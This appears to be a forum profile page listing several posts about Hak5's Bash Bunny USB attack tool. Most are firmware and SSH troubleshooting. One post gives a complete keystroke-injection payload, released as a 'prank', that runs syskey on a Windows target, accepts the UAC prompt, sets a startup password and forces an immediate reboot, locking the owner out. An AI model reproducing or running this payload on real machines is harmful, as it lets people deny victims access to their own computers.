Jump to content

InfoSecREDD

Active Members
  • Posts

    147
  • Joined

  • Last visited

  • Days Won

    9

Everything posted by InfoSecREDD

  1. Yes. This is still the case, just ignore the error from Hak5's Repo for the moment. All other repo's sync fine.
  2. PuTTy URL: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
  3. Try using PuTTy for Windows to connect. The issue with it not being able to be accessed via Windows is really interesting. Make sure you follow the exact directions on the "Manual Upgrade" Documentation, and back up your loot folder. (Anytime firmware is flashed, storage will get wiped.)
  4. One.. Your loot directory deletes when you upgrade firmware. 2nd issue, with the SSH issue. - I would personally try to manually force a firmware upgrade to make sure everything worked perfectly. Also make sure your md5sum of the file is same as the firmware file on the Hak5 Servers.
  5. There is a payload for Windows that does this all for you called "Windows NIC Sharing". Should be in your payload library under General. :) Hope that helps a lil.
  6. Since I have a broken BashBunny and the skills to perform a dump or interact with the Development part of the BashBunny. I was wondering if it was allowed to post findings and possible improvements I can make/share with the Dev Community to possibly make this firmware any better?.. -Ar1k88
  7. Oh I know I could do it, I was waiting for "Hak5" to do it.. Lol.. :P I have a Zero W with P4wnP1 already on it.. Honestly BashBunny is more convenient to use than the P4wnP1.. But both has it's advantages.. :)
  8. Yeah this has been around for months.. I've been waiting for Hak5 to put the MouseHID in to the BashBunny.. But I'll go back to being quiet now..
  9. I saw a Syskey Prank done on a USB via RubberDucky. So I decided to rewrite one for the Bashbunny even tho it really serves no great purpose. So furthermore, after Syskey'ing myself. I dont want the dang thing anymore, so I'm releasing it. #!/bin/bash # # Title: SysKey and Reboot # Author: Ar1k88 # Version: 1.1b # Target: Windows 7-10 # # LED | Function # --------------------------------------------------------- # MAGENTA SLOW - USB Detection/Setup # YELLOW FAST/VERYFAST - Script Startup/Execute # CYAN VERYFAST - Shutting down Target Machine # GREEN BLINK/SOLID - Shutting down Bashbunny for safe removal # LED OFF - Bashbunny is Off, Safe to remove. # # Startup Delay 3 seconds. LED M SLOW ATTACKMODE HID Q DELAY 3000 # Force to Desktop LED Y FAST Q GUI d Q DELAY 250 # Open Run and Syskey Q GUI r Q DELAY 500 Q STRING syskey Q ENTER Q DELAY 500 # UAC Bypass Q ALT y # Setup Syskey - Setting Password as bashbunny LED Y VERYFAST Q DELAY 500 Q STRING u Q DELAY 250 Q STRING p Q DELAY 250 Q STRING w Q DELAY 250 Q STRING bashbunny Q TAB Q DELAY 250 Q STRING bashbunny Q DELAY 250 Q ENTER Q DELAY 500 Q ENTER # Rebooting Target Machine LED C VERYFAST Q GUI r Q DELAY 500 Q STRING CMD Q ENTER Q DELAY 500 Q STRING shutdown /r /f /t 0 Q ENTER Q DELAY 250 # Success - Starting Bashbunny Safe Shutdown LED SUCCESS sync -o Q DELAY 3000 shutdown 0 SysKey Password: bashbunny Please be responsible. ;) -Ar1k88
×
×
  • Create New...